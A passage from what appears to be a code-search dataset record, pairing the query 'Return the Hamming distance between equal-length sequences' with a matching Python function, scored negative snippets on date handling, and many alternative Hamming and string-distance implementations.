datetime.datetime.strptime(date3, \"%b %d, %Y\")\n dm4 = datetime.datetime.strptime(date4, \"%b %d, %Y\")\n delta = dm4 - dm3\n\n #Returning the results in a tuple\n return dt2, dm2, delta.days", "def convert_datetime(x):\n try:\n start = datetime(1960, 1, 1)\n return start + timedelta(days=int(x))\n except:\n return None", "def now_minus(days: int):\n return NOW - datetime.timedelta(days=days)", "def get_timeval():\n return convert_timeval(time.time())", "def get_ts_delta(ts):\n if isinstance(ts, tuple) and len(ts) == 2:\n return timedelta(seconds=ts[0], microseconds=ts[1])\n else:\n # Kept for compatibility reasons\n return timedelta(seconds=ts)", "def adjustedCompareValue(self, value):\n if value.startswith('now'):\n return repr(GenDate())\n return value", "def get_prev_weekday(x: Optional[Date] = None) -> Date:\n ## Get the day:\n x = x or get_today()\n\n ## Define the offset:\n offset = max(1, (x.weekday() + 6) % 7 - 3)\n\n ## Compute the day and return:\n return x - TimeDelta(days=offset)", "def call_and_return_with_timing(f, *args, **kwargs):\n from datetime import datetime\n before = datetime.now()\n result = f(*args, **kwargs)\n after = datetime.now()\n return (result, after-before)", "def human_date(delta):\n if delta < datetime.timedelta(minutes=1):\n unit = \"{0} {1}\".format(delta.seconds, pluralize(delta.seconds, \"second,seconds\"))\n elif delta < datetime.timedelta(hours=1):\n unit = \"{0} {1}\".format(delta.seconds//60, pluralize(delta.seconds//60, \"minute,minutes\"))\n elif delta < datetime.timedelta(days=1):\n unit = \"{0} {1}\".format(delta.seconds//3600, pluralize(delta.seconds//3600, \"hour,hours\"))\n elif delta < datetime.timedelta(weeks=1):\n unit = \"{0} {1}\".format(delta.days, pluralize(delta.days, \"day,days\"))\n elif delta <= datetime.timedelta(days=30):\n unit = \"{0} {1}\".format(delta.days//7, pluralize(delta.days//7, \"week,weeks\"))\n elif delta <= datetime.timedelta(days=365):\n unit = \"{0} {1}\".format(delta.days//30, pluralize(delta.days//30, \"month,months\"))\n else:\n unit = \"{0} {1}\".format(delta.days//365, pluralize(delta.days//365, \"year,years\"))\n return unit", "def parse_delta(delta):\n match = TIMEDELTA_PATTERN.match(delta)\n if match:\n parts = {k: int(v) for k, v in match.groupdict().items() if v}\n return datetime.timedelta(**parts)", "def convert_times(value):\r\n day_patern = re.compile('\\d{4}-\\d{2}-\\d{2}')\r\n week_pattern = re.compile('\\d{4}-W\\d{2}')\r\n month_pattern = re.compile('\\d{4}-\\d{2}')\r\n year_pattern = re.compile('\\d{4}')\r\n\r\n if re.match(day_patern, value):\r\n date = datetime.strptime(value, '%Y-%m-%d')\r\n end = date + timedelta(days=1)\r\n return date, end\r\n elif re.match(week_pattern, value):\r\n date = datetime.strptime(value + '-1', '%Y-W%W-%w')\r\n end = date + timedelta(days=7)\r\n return date, end\r\n elif re.match(month_pattern, value):\r\n date = datetime.strptime(value, '%Y-%m')\r\n if date.month == 12:\r\n end = date.replace(year=date.year + 1, month=1)\r\n else:\r\n end = date.replace(month=date.month + 1)\r\n return date, end\r\n elif re.match(year_pattern, value):\r\n date = datetime.strptime(value, '%Y')\r\n end = date.replace(year=date.year + 1)\r\n return date, end\r\n else:\r\n raise ValueError('Date not recognised')" ]
[ "0.77345294", "0.6244832", "0.6088585", "0.577737", "0.5701926", "0.56636906", "0.56362903", "0.559285", "0.5573411", "0.5541884", "0.5530724", "0.55193424", "0.55110997", "0.54977155", "0.54975235", "0.54929054", "0.5488044", "0.54846984", "0.545197", "0.5361616", "0.5360478", "0.5347188", "0.5314906", "0.5292867", "0.5246696", "0.52228487", "0.52108926", "0.5202497", "0.5199447", "0.5193448", "0.5186585", "0.5180624", "0.51705235", "0.5169146", "0.51578003", "0.5141815", "0.5140469", "0.5140429", "0.5133359", "0.5117408", "0.5083325", "0.50788075", "0.5061089", "0.50581425", "0.50475854", "0.5041748", "0.5006847", "0.499926", "0.49916553", "0.4988066", "0.495869", "0.49582735", "0.49550855", "0.49400094", "0.49070317", "0.4878035", "0.48759007", "0.4867226", "0.486692", "0.48598978", "0.48543018", "0.48534366", "0.48528406", "0.48513308", "0.48489052", "0.48436254", "0.48358417", "0.48331976", "0.4831602", "0.48245403", "0.48174354", "0.4811652", "0.48056507", "0.48055497", "0.48045424", "0.48020104", "0.48015666", "0.47911635", "0.478754", "0.47820303", "0.47758812", "0.47751954", "0.47740218", "0.47726017", "0.47659057", "0.4765847", "0.47504154", "0.47359166", "0.47119966", "0.46970618", "0.46957523", "0.4690251", "0.46871582", "0.4686447", "0.46748385", "0.4671387", "0.46685392", "0.4665991", "0.46646306", "0.46592227" ]
0.7786376
0
Return the Hamming distance between equallength sequences
def __hamming_distance(s1, s2): if len(s1) != len(s2): raise ValueError("Undefined for sequences of unequal length") return sum(el1 != el2 for el1, el2 in zip(s1, s2))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def hamming_distance(s1, s2):\n if len(s1) != len(s2):\n raise ValueError(\"Undefined for sequences of unequal lenght.\")\n return sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))", "def hammingDistance(s1 = \"\", s2 = \"\"):\n # if len(s1) != len(s2):\n # raise ValueError(\"Undefined for sequences of unequal length\")\n return sum(bool(ord(ch1) - ord(ch2)) for ch1, ch2 in zip(s1, s2))", "def hamming_dist(self):\r\n distance = 0\r\n distance = abs(len(self.s1) - len(self.s2))\r\n distance += sum(i1 != i2 for i1,i2 in zip(self.s2,self.s1))\r\n return distance", "def hamming_distance(s1, s2):\n assert(len(s1) == len(s2))\n return np.sum([1 if c1 != c2 else 0 for c1, c2 in zip(s1, s2)])", "def hamming_dist(seq1, seq2):\n diffs = 0\n length = 0\n for x, y in zip(str(seq1), str(seq2)):\n if x == '-' or y == '-':\n continue\n elif x != y:\n diffs += 1\n length += 1\n try:\n return float(diffs) / length\n except:\n return 0.5", "def hamming_distance(s1, s2):\n return sum(c1 != c2 for c1, c2 in zip(s1, s2))", "def hamming_distance(a, b):\n return np.count_nonzero(a != b)", "def hamming_distance(s1, s2):\n if len(s1) > len(s2):\n s2 = s2.ljust(len(s1))\n else:\n s1 = s1.ljust(len(s2))\n\n return sum(el1 != el2 for el1, el2 in zip(s1, s2))", "def hamming_distance(input1, input2):\n if len(input1) != len(input2):\n raise ValueError('Length of input1 and input2 are not equal.')\n input1 = hex_decode(hex_encode(input1))\n input2 = hex_decode(hex_encode(input2))\n # the general strategy here is to xor the two strings together\n # and then just count the number of 1s in the output (i.e., where the\n # two strings differed).\n output = fixed_xor(input1, input2)\n distance = 0\n for byte in output:\n for i in range(8):\n bit_mask = 1 << i\n if (bit_mask & byte) == bit_mask:\n distance += 1\n return distance", "def hamming_distance(cs):\n d = 0.0\n end = len(cs) - 1\n for idx in range(end):\n s1 = cs[idx]\n s2 = cs[idx + 1]\n assert len(s1) == len(s2)\n s1_bits = ''.join('{:b}'.format(c).zfill(8) for c in s1)\n s2_bits = ''.join('{:b}'.format(c).zfill(8) for c in s2)\n d += sum(c1 != c2 for c1, c2 in zip(s1_bits, s2_bits))\n return d / end", "def hamming_distance(s1, s2):\n assert len(s1)==len(s2), \",\".join((s1, s2))\n s1 = np.array(s1.upper(), dtype=\"c\")\n s2 = np.array(s2.upper(), dtype=\"c\")\n return np.sum(s1 != s2)", "def hamming_distance(x1: np.ndarray, x2: np.ndarray) -> int:\n assert isinstance(x1, np.ndarray) and isinstance(x2, np.ndarray)\n return (x1 != x2).sum()", "def hamming_distance(p, q):\n result = 0\n for x, y in zip(p, q):\n if x != y:\n result += 1\n return result + abs(len(p) - len(q))", "def compute_hamming_distance(str1, str2):\n\n mismatches = 0\n len_strs = len(str1)\n for i in range(len_strs):\n if str1[i] != str2[i]:\n mismatches = mismatches + 1\n return mismatches", "def hamming_distance(h1, h2):\n b1 = bitarray.bitarray()\n b1.frombytes(h1)\n b2 = bitarray.bitarray()\n b2.frombytes(h2)\n return bitarray.bitdiff(b1, b2)", "def hamming_distance(lhs,rhs):\n return len([(x,y) for x,y in zip(lhs,rhs) if x !=y])", "def hamming_dist(bytes1, bytes2):\n if type(bytes1) == str:\n bytes1 = [ord(c) for c in str1]\n if type(bytes2) == str:\n bytes2 = [ord(c) for c in str2]\n bins = [bin(o1 ^ o2) for o1, o2 in zip(bytes1, bytes2)]\n return len([i for i in ''.join(bins) if i == '1'])", "def HammingDistance(pattern1, pattern2):\n distance = 0\n if len(pattern1) == len(pattern2):\n for i in range(len(pattern1)):\n if pattern1[i]!=pattern2[i]:\n distance += 1\n return distance\n else:\n assert 0, \"Two patterns have different lengths.\"", "def hamming_dist(a_b, b_b):\n return sum(bin(a_b[n] ^ b_b[n]).count('1') for n in range(len(a_b)))", "def hamming_distance(str1, str2):\n\n # TODO: Write your solution here\n # Edge case check\n if len(str1) != len(str2):\n return None\n\n count = 0\n for index in range(len(str1)):\n if str1[index] != str2[index]:\n count += 1\n\n if count is 0:\n return None\n\n return count", "def hamming_distance(a, b):\n assert len(a) == len(b)\n dist = sum(item_a != item_b for item_a, item_b in zip(a, b))\n return dist", "def generalised_hamming_distance(a, b):\n if len(a) == len(b):\n return hamming_distance(a, b)\n if len(a) > len(b):\n dna = a\n kmer = b\n else:\n dna = b\n kmer = a\n k = len(kmer)\n\n dist = min([hamming_distance(kmer, kmer2) for kmer2 in kmers_from_dna(dna, k)])\n return dist", "def hamming_dist(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.HammingDistance()\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n\n # Call the function to compute the distance\n return measure.get_raw_score(s1, s2)", "def hamming_distance(bytes_0: bytes, bytes_1: bytes) -> int:\n assert len(bytes_0) == len(bytes_1)\n return sum(sum(bits(byte_0 ^ byte_1)) for (byte_0, byte_1) in zip(bytes_0, bytes_1))", "def hamming_distance(StringA,StringB):\n if len(StringA) != String(B):\n raise ValueError(\"The length of sequences are not equal!\")\n return sum(x !=y for (x,y) in zip(StringA,StringB))", "def hamming_dist(gene_1, gene_2):\n ham_dist = 0\n for c1, c2 in zip(gene_1, gene_2):\n if c1 != c2:\n ham_dist += 1\n return ham_dist", "def hamming_distance(string_a: str, string_b: str) -> int:\n if len(string_a) != len(string_b):\n raise ValueError(\n \"Strings are of unequal length can not compute hamming distance. Hamming distance is undefined.\"\n )\n return sum(char_1 != char_2 for char_1, char_2 in zip(string_a, string_b))", "def hammingDist(x, y):\n hd = 0\n for ch1, ch2 in zip(x, y):\n if ch1 != ch2:\n hd += 1\n return hd", "def HammingDist(str1, str2):\n\tHdist = 0\n\tfor i, base in enumerate(str1):\n\t\tif base != str2[i]:\n\t\t\tHdist += 1\n\n\treturn Hdist", "def hamming(a, b):\n len1 = len(a)\n len2 = len(b)\n overlap = min(len1, len2)\n difference = abs(len1 - len2)\n for x in range(overlap):\n if a[x] != b[x]:\n difference += 1\n\n return difference", "def HammingDistance(p, q):\r\n if len(p) != len(q):\r\n return -1\r\n dist = 0\r\n #zip(AB,CD) gives (('A','C'),('B','D'))\r\n for first, second in zip(p, q):\r\n if first != second:\r\n dist = dist + 1\r\n return dist", "def hamming(string1, string2):\n\n strlen1 = len(string1)\n strlen2 = len(string2)\n\n if strlen2 < strlen1:\n strlength = strlen2\n else:\n strlength = strlen1\n\n hamcount = 0\n for i in range(strlength):\n if string1[i] != string2[i]:\n hamcount += 1\n\n return(hamcount)", "def countingPointMutations(seq1, seq2):\n seqLength = len(list(seq1))\n \n hammingDistance=0;\n for i in range(0,seqLength):\n if list(seq1)[i]!=list(seq2)[i]:\n hammingDistance = hammingDistance+1;\n return hammingDistance", "def distance(base_strand, comparison_strand):\n hamming_distance = 0\n\n for nucleotide in range(len(base_strand)):\n if base_strand[nucleotide] != comparison_strand[nucleotide]:\n hamming_distance += 1\n \n return hamming_distance", "def hamming_distance(string1: str, string2: str) -> int:\n if len(string1) != len(string2):\n raise ValueError(\"String lengths must match!\")\n\n count = 0\n\n for char1, char2 in zip(string1, string2):\n if char1 != char2:\n count += 1\n\n return count", "def hamming_distance(s1, s2, hamming_distance = 3):\n\ts1 = str(s1)\n\ts2 = str(s1)\n\n\tif len(s1) != len(s2):\n\t\ts1 = replenish_int(s1, 6)\n\t\ts2 = replenish_int(s2, 6)\n\tdis = sum(ch1 != ch2 for ch1, ch2 in zip(s1, s2))\n\n\tif dis <= hamming_distance:\n\t\t'表示海明距离在 3 以内'\n\t\treturn True\n\telse:\n\t\treturn False", "def hamming_dist(v1, v2):\r\n edits = (v1 != v2)\r\n return edits.sum()", "def hamming(seq1, seq2) -> int:\n if type(seq1) is SeqRecord:\n return hamming(seq1.seq, seq2)\n elif type(seq2) is SeqRecord:\n return hamming(seq1, seq2.seq)\n elif (type(seq1) is str or type(seq1) is Seq) and (type(seq2) is Seq or type(seq2) is str):\n if len(seq1) != len(seq2):\n raise ValueError('The sequences are of different lengths!')\n else:\n distance = 0\n for i in range(len(seq1)):\n if seq1[i] != seq2[i]:\n distance += 1\n return distance\n else:\n raise TypeError('Wrong type.')", "def hamdist(inp):\n\treturn sum(c1 != c2 for c1, c2 in itertools.izip(inp[0],inp[1]))", "def hamming(s1, s2):\n weight = abs(len(s1)-len(s2))\n if len(s1) < len(s2):\n s1, s2 = s2, s1\n for i in range(len(s2)):\n weight += not s1[i] == s2[i]\n return weight", "def get_hamming_distance(self, calc_bits):\n\n # Iterate through calculated bits and compare to received bits.\n # Store number of different bits in total_distance.\n total_distance = 0\n for idx, bit in enumerate(calc_bits):\n diff = abs(bit - self.received_bits[idx])\n total_distance += diff\n\n return total_distance", "def hamming(strand1, strand2):\r\n strand1_len = len(strand1)\r\n strand2_len = len(strand2)\r\n\r\n count = abs(strand1_len - strand2_len)\r\n\r\n for i in range(min((strand1_len, strand2_len))):\r\n if strand1[i] != strand2[i]:\r\n count += 1\r\n\r\n return count", "def HammingDistance(array1, array2, normed=False):\n # 0) PREPARE FOR CALCULATIONS\n # 0.1) Convert the arrays into rank-1 arrays\n if len(np.shape(array1)) > 1:\n array1 = array1.reshape(-1)\n if len(np.shape(array2)) > 1:\n array2 = array2.reshape(-1)\n\n # 0.2) Security check\n if len(array1) != len(array2):\n raise ValueError( \"Arrays are not aligned\" )\n\n # 1) COUNT THE NUMBER OF COINCIDENCES\n similarity = (array1 == array2)\n n_equal = similarity.sum()\n\n # 2) COMPUTE THE HAMMING DISTANCE\n length = len(array1)\n h_dist = 1. - float(n_equal) / length\n\n # 3) RETURN RESULT ACCORDING TO OPTIONS\n # Standard Hamming distance\n if not normed:\n return h_dist\n\n # Normalized Hamming distance\n else:\n # Count the number of ones in the two arrays\n n_1 = len(array1.nonzero()[0])\n n_2 = len(array2.nonzero()[0])\n\n # Estimate the expected number of random coincidences\n exp_nc = 1.0 / length * (n_1 * n_2 + (length - n_1) * (length - n_2))\n\n # The expected Hamming distance\n exp_hdist = 1.0 - exp_nc / float(length)\n\n return h_dist, exp_hdist", "def hamming(s1, s2):\n s1 = str(s1)\n s2 = str(s2)\n if len(s1) != len(s2):\n raise ValueError(\"Undefined for sequences of unequal length.\")\n return sum(el1 != el2 for el1, el2 in zip(s1, s2))", "def lcs_hamming_only_matches(s1: str, s2: str, k: int, length: int, matches_lst: List):\n count = 0\n for i in range(0, len(s1) - length + 1):\n for j in range(0, len(s2) - length + 1):\n sub1 = s1[i: i + length]\n sub2 = s2[j: j + length]\n result = hamming_distance(sub1, sub2)\n if result <= k:\n matches_lst.append([i, j, result, sub1, sub2])\n count += 1\n # print(\"total matches: \" + str(count))\n return count", "def hamming(s1, s2):\n assert len(s1) == len(s2)\n return sum(c1 != c2 for c1, c2 in zip(s1, s2))", "def hamming_sim(s1, s2):\n\n if s1 is None or s2 is None:\n return np.NaN\n if pd.isnull(s1) or pd.isnull(s2):\n return np.NaN\n\n # Create the similarity measure object\n measure = sm.HammingDistance()\n\n s1 = gh.convert_to_str_unicode(s1)\n s2 = gh.convert_to_str_unicode(s2)\n\n # Call the function to compute the similarity score.\n return measure.get_sim_score(s1, s2)", "def get_distance_hamming(self, vec):\r\n\r\n sum = 0\r\n if len(self.weights) == len(vec):\r\n return self.hamming(self.weights, vec)\r\n else:\r\n sys.exit(\"Error: dimension of nodes != input data dimension!\")", "def hamming_byte(bin1, bin2):\n\n diffs = 0\n xored = xor(bin1, bin2)\n for byte in xored:\n diffs += bin(byte).count(\"1\")\n return diffs", "def hamdist(str1, str2):\n\n diffs = 0\n for ch1, ch2 in zip(str1, str2):\n if ch1 != ch2:\n diffs += 1\n return diffs", "def hamming_str(s1, s2):\n\n diffs = 0\n bin1 = bin(int(s1.encode('hex'), 16))\n bin2 = bin(int(s2.encode('hex'), 16))\n\n # for bit1, bit2 in zip(bin1, bin2):\n for bit1, bit2 in map(None, bin1, bin2):\n if bit1 != bit2:\n diffs += 1\n return diffs", "def manhatam_distance(self) -> int:\n raise NotImplementedError", "def hamming2(s1, s2):\n assert len(s1) == len(s2)\n return sum(c1 != c2 for c1, c2 in zip(s1, s2))", "def hamming_distance(words: Iterator[str], vocabulary: Dict[str, int]):\n\n for word in words:\n distances = []\n suggestions = []\n vocab_list = list(vocabulary)\n for (i,vocab) in enumerate(vocab_list):\n if len(vocab) == len(word):\n distances.append(hamming(word, vocab))\n else:\n distances.append(120)\n \n idx = np.array(distances).argsort()[:5]\n \n for i in range(5):\n for j in range(i+1,5):\n if distances[idx[i]] == distances[idx[j]]:\n if vocabulary.get(vocab_list[idx[i]]) < vocabulary.get(vocab_list[idx[j]]):\n temp = idx[i] \n idx[i] = idx[j]\n idx[j] = temp \n\n for i in idx:\n suggestions.append(vocab_list[i])\n\n output(\"{misspelled}\\t{corrections}\".format(\n misspelled=word,\n corrections=\"\\t\".join(suggestions)\n )) # may cause IO bottleneck", "def chk_hamming(data):\n pass", "def distance(self, x, y):\n\n return distance.hamming(x, y)", "def hamming_distance(v_est, v_true):\n assert(v_est.shape == v_true.shape)\n\n return 1 / len(v_est) * np.sum(v_est != v_true)", "def ham_dist(p, q):\n count = 0\n for i in range(len(p)):\n if p[i] != q[i]:\n count += 1\n return count", "def ham_dist(p, q):\n count = 0\n for i in range(len(p)):\n if p[i] != q[i]:\n count += 1\n return count", "def distance(dna_1, dna_2):\n hamming_difference = 0\n\n # turn the strings into a list of characters\n a = list(dna_1)\n b = list(dna_2)\n\n # iterate through both lists and compares. If they are not the same increment the hamming_difference\n for nucleotide_1, nucleotide_2 in map(None, dna_1, dna_2):\n if nucleotide_1 != nucleotide_2:\n hamming_difference += 1\n\n return hamming_difference", "def minHamm(text,pattern):\r\n D=kmersfrequency(text,len(pattern))\r\n return (min([(HammingDistance(pattern,x)) for x in D.keys()]))", "def hamming(text1, text2):\n assert (len(text1) == len(text2))\n return sum(a != b for a, b in zip(text1, text2))", "def structural_hamming_distance(self,\n other,\n penalty_edge_mismatch_func=None):\n\n edges_1 = self.edges\n edges_2 = other.edges\n if penalty_edge_mismatch_func is None:\n penalty_edge_mismatch_func = GraphViaEdges.compute_penalty\n\n if set(edges_1.keys()) != set(edges_2.keys()):\n msg = 'The Structural Hamming Distances cannot be computed : the '\n msg += 'graphs cannot be compared.'\n raise GraphsCannotBeCompared(msg)\n\n shd = 0\n\n for key in edges_1.keys():\n\n shd += penalty_edge_mismatch_func(\n edge_1=edges_1[key],\n edge_2=edges_2[key]\n )\n\n return shd", "def nb_vector_hamming_distance(indices, seqs_mat, seqs_L, check_lengths=True):\n return _nb_vector_hamming_distance(indices, seqs_mat, seqs_L, check_lengths)", "def __h2(self): # _manhattan_distance\n h2 = 0\n\n for i in range(self.board_size):\n for j in range(self.board_size):\n if self.arr[i][j] == 0:\n continue\n h2 += (abs(i-(self.arr[i][j]//self.board_size)) +\n abs(j-(self.arr[i][j] % self.board_size)))\n\n return h2", "def hamming_algorithm(data: bytearray):\n print(f\"data: {data}\")\n # 12345678 12345678 12345678 12345678\n if len(data) % 4 != 0:\n diff = 4 - len(data) % 4\n data += bytes(diff)\n m = len(data)\n r = 0\n chunck = 0\n i = 0\n ret_data = bytearray()\n while i < m // 4:\n chunck = struct.unpack(\"I\", data[i*4:i*4 + 4])[0]\n chunck, chunck_str = insert_redundant_bits(chunck)\n print(f\"chunck: {chunck} chunck_str:{chunck_str}\")\n i += 1", "def Hamming(data):\r\n N=float(data.shape[0])\r\n temp=np.zeros(data.shape[0])\r\n for u, i in enumerate(data):\r\n temp[u]=(0.54-0.46*np.cos(2*np.pi*(u/N)))*i\r\n return temp", "def manhatam_distance(self) -> int:\n return abs(self.position[0]) + abs(self.position[1])", "def distance_between_hex_cells(cell1, cell2):\n return even_q_distance(*(cell1 + cell2))", "def distance(self, record):\n return hamming_dist(self.centroid.seq, record.seq)", "def kmer_distance(seq1,seq2,k=3):\n seq1_set = set(count_kmers(seq1,k).keys())\n seq2_set = set(count_kmers(seq2,k).keys())\n union_seq = seq1_set.union(seq2_set)\n dissimilarity = seq1_set ^ seq2_set\n distance = len(dissimilarity)/len(union_seq)\n print(dissimilarity)\n return distance", "def _pairwise_dist(self,seq1,seq2):\n \n return jf.damerau_levenshtein_distance(str(seq1), str(seq2))", "def calculate_weighted_hash(cls, word):\n\n hash_value = 0\n for char in word:\n hash_value += cls.alpha_lookup[char.lower()]\n return hash_value", "def _reduce(self, hash):\n summation = 0\n for char in hash:\n summation += ord(char)\n return summation % self._size", "def min_ham_dist(pattern, dna):\n dist = 0\n candidates = []\n for seq in dna:\n a, b = min_ham_dist_helper(pattern, seq)\n dist += a\n candidates.append(b)\n return dist, candidates", "def text_similarity(this_text, other_text, shingle_length=5, minhash_size=200, random_seed=5):\n this_shingles = ShingledText(this_text, random_seed=random_seed, shingle_length=shingle_length, minhash_size=minhash_size)\n other_shingles = ShingledText(other_text, random_seed=random_seed, shingle_length=shingle_length, minhash_size=minhash_size)\n return this_shingles.similarity(other_shingles)", "def jaccard_distance(sentence_a, sentence_b):\n set_a = set(sentence_a.split())\n set_b = set(sentence_b.split())\n distance = (len(set_a.union(set_b)) - len(set_a.intersection(set_b))) / len(set_a.union(set_b))\n return distance", "def _calc_distance(hmm1, hmm2, seqs2):\n p12 = hmm1.calc_loglikelihood(seqs2)\n p22 = hmm2.calc_loglikelihood(seqs2)\n # calc total number of elements in all sequences\n # TODO: consider the case when number of elements vary from seq to seq\n n_elements = len(seqs2) * len(seqs2[0])\n return (p22 - p12) / n_elements", "def _PD_hamming(alignA, alignB, subst, bySite, withinA, ignoreGaps=True):\n L = len(alignA.iloc[0])\n gapCode = AA2CODE['-']\n\n \"\"\"Convert alignments into integer arrays first to speed comparisons\"\"\"\n matA = np.zeros((len(alignA), L))\n for seqi, s in enumerate(alignA):\n matA[seqi,:] = _seq2vec(s)\n if not withinA:\n matB = np.zeros((len(alignB), L))\n for seqi, s in enumerate(alignB):\n matB[seqi,:] = _seq2vec(s)\n\n \"\"\"Dist will be 1 where equal, 0 where not and nan if one is a gap\"\"\"\n if withinA:\n dist=np.zeros((int(scipy.special.comb(len(alignA), 2)), L))\n allPairs = itertools.combinations(np.arange(len(alignA)), 2)\n for j, (seqi1, seqi2) in enumerate(allPairs):\n dist[j,:] = matA[seqi1,:]!=matA[seqi2,:]\n if ignoreGaps:\n gapInd = (matA[seqi1,:]==gapCode) | (matA[seqi2,:]==gapCode)\n dist[j, gapInd] = np.nan\n else:\n dist=np.zeros((len(alignA)*len(alignB), L))\n allPairs = itertools.product(np.arange(len(alignA)), np.arange(len(alignB)))\n for j, (seqiA, seqiB) in enumerate(allPairs):\n dist[j,:] = matA[seqiA,:]!=matB[seqiB,:]\n if ignoreGaps:\n gapInd = (matA[seqiA,:]==gapCode) | (matB[seqiB,:]==gapCode)\n dist[j, gapInd] = np.nan\n\n if not bySite:\n dist=np.nanmean(dist, axis=1)\n return np.nanmean(dist, axis=0)", "def lcs_hamming_only_matches_with_many_k(s1: str, s2: str, ks: List[int], length: int, matches_lst: List, query_name, target_name):\n file_name = './chromo_matches_' + str(length) + '.txt'\n f = open(file_name, mode='a')\n count = [0, 0, 0]\n for i in range(0, len(s1) - length + 1):\n for j in range(0, len(s2) - length + 1):\n sub1 = s1[i: i + length]\n sub2 = s2[j: j + length]\n result = hamming_distance(sub1, sub2)\n if result <= 0:\n # matches_lst.append([query_name, target_name, i, j, result, sub1, sub2])\n f.write(query_name + ',' + target_name + ',' + str(i) + ',' + str(j) + ',' + str(k)+ ',' + str(sub1) + ',' + sub2 + '\\n')\n count[0] += 1\n if result <= 1:\n f.write(query_name + ',' + target_name + ',' + str(i) + ',' + str(j) + ',' + str(k)+ ',' + str(sub1) + ',' + sub2 + '\\n')\n count[1] += 1\n if result <= 2:\n f.write(query_name + ',' + target_name + ',' + str(i) + ',' + str(j) + ',' + str(k)+ ',' + str(sub1) + ',' + sub2 + '\\n')\n count[2] += 1\n\n # print(\"total matches: \" + str(count))\n f.close()\n return count", "def hamming(x, y):\n\n # The implem is 'symbolic', meaning that vectors can be coded not with just\n # zeros and ones, but with anything at all.\n # hamming([0, 1], [0, 1]) = 0 + 0\n # hamming([0, 1], [0, 2]) = 0 + 1\n # hamming([0, 1], [0, 5]) = 0 + 1\n # This is usefull for the monk2 dataset for ex., where some binary features\n # are coded as '1' or '2'.\n return sum(xi != yi for (xi,yi) in zip(x, y))", "def calc_symmetric_distance(hmm1, hmm2, T, K=1, seed=None):\n seqs1, _ = hmm1.generate_sequences(K, T, seed=seed)\n seqs2, _ = hmm2.generate_sequences(K, T, seed=seed)\n return np.abs(_calc_distance(hmm1, hmm2, seqs2) +\n _calc_distance(hmm2, hmm1, seqs1)) / 2", "def cycleLength(ch,distance):\n countryNo=len(ch)\n total = 0.\n for c in range(countryNo):\n total += distance[ch[c]][ch[(c+1)%countryNo]]\n return total", "def face_distance(face_encodings, face_to_compare):\n import numpy as np\n if len(face_encodings) == 0:\n print('encoding 等于零')\n return np.empty((0))\n distance = np.linalg.norm(face_encodings - face_to_compare)\n return distance", "def distance_modulus(d):\n dmag = 5 * log(d) - 5\n return dmag", "def length_dist(self,synset_1, synset_2):\n\t l_dist = sys.maxsize\n\t if synset_1 is None or synset_2 is None: \n\t return 0.0\n\t if synset_1 == synset_2:\n\t # if synset_1 and synset_2 are the same synset return 0\n\t l_dist = 0.0\n\t else:\n\t wset_1 = set([str(x.name()) for x in synset_1.lemmas()]) \n\t wset_2 = set([str(x.name()) for x in synset_2.lemmas()])\n\t if len(wset_1.intersection(wset_2)) > 0:\n\t # if synset_1 != synset_2 but there is word overlap, return 1.0\n\t l_dist = 1.0\n\t else:\n\t # just compute the shortest path between the two\n\t l_dist = synset_1.shortest_path_distance(synset_2)\n\t if l_dist is None:\n\t l_dist = 0.0\n\t # normalize path length to the range [0,1]\n\t return math.exp(-self.ALPHA * l_dist)", "def manhatam_distance(self) -> int:\n return abs(self.north) + abs(self.east)", "def distance(a, b):\n a = a[0]\n b = b[0]\n if lower.search(a):\n if lower.search(b):\n return abs(ord(b) - ord(a)) % 8\n elif upper.search(b):\n return abs(ord(b.lower()) - ord(a)) % 5 + 8\n elif upper.search(a):\n if lower.search(b):\n return abs(ord(a.lower()) - ord(b)) % 5 + 8\n elif upper.search(b):\n return abs(ord(b) - ord(a)) % 8\n if a == b:\n return 0\n return 1", "def mm_similarity(s1, s2):\n if filter(str.isalpha, s1) == filter(str.isalpha, s2):\n if len(s1) < len(s2):\n return float(len(s1)) / len(s2)\n else:\n return float(len(s2)) / len(s1)\n else:\n return 0.", "def distance(self, word_a, word_b):\n word_a, word_b = word_a.upper(), word_b.upper()\n s_a = self.word_lookup[word_a]\n s_b = self.word_lookup[word_b]\n j = 1\n max_len = min(len(s_a), len(s_b))\n while j <= max_len:\n if s_a[-j] != s_b[-j]:\n break\n j += 1\n return j", "def hex_distance(a, b):\n return (abs(a[0] - b[0]) + abs(a[1] - b[1]) +\n abs((-a[0] - a[1]) - (-b[0] - b[1]))) / 2", "def distance_between_pattern_and_strings(pattern, dna):\n\n k = len(pattern)\n distance = 0\n\n for text in dna:\n hamming_distance = 1000000\n for i in range(len(text) - k + 1):\n if hamming_distance > compute_hamming_distance(pattern, text[i:i + k]):\n hamming_distance = compute_hamming_distance(pattern, text[i:i + k])\n distance = distance + hamming_distance\n return distance", "def calc_length(self):\n return AtomMath.length(self.atom1.position - self.atom2.position)", "def word_rotator_similarity(x, y):\n return 1 - word_rotator_distance(x, y)", "def homophily(G, chars, IDs):\n num_same_ties = 0\n num_ties = 0\n for n1, n2 in G.edges():\n if IDs[n1] in chars and IDs[n2] in chars:\n if G.has_edge(n1, n2):\n num_ties += 1\n if chars[IDs[n1]] == chars[IDs[n2]]:\n num_same_ties += 1\n return (num_same_ties / num_ties)", "def qwerty_distance():\n from collections import defaultdict\n import math\n R = defaultdict(dict)\n R['-']['-'] = 0\n zones = [\"dfghjk\", \"ertyuislcvbnm\", \"qwazxpo\"]\n keyboard = [\"qwertyuiop\", \"asdfghjkl\", \"zxcvbnm\"]\n for num, content in enumerate(zones):\n for char in content:\n R['-'][char] = num + 1\n R[char]['-'] = 3 - num\n for a in ascii_lowercase:\n rowA = None\n posA = None\n for num, content in enumerate(keyboard):\n if a in content:\n rowA = num\n posA = content.index(a)\n for b in ascii_lowercase:\n for rowB, contentB in enumerate(keyboard):\n if b in contentB:\n R[a][b] = int(math.fabs(rowB - rowA) + math.fabs(posA - contentB.index(b)))\n return R", "def hamming_weight(num):\n\n return bin(num).count(\"1\");", "def euclidean_distance(s1,s2): \n tmpsum = 0\n \n for index,value in enumerate(s1):\n tmpsum += (s1[index]-s2[index])**2\n \n return math.sqrt(tmpsum)", "def min_ham_dist_helper(pattern, seq):\n k = len(pattern)\n dist = math.inf\n candidates = set()\n for i in range(len(seq)-k+1):\n 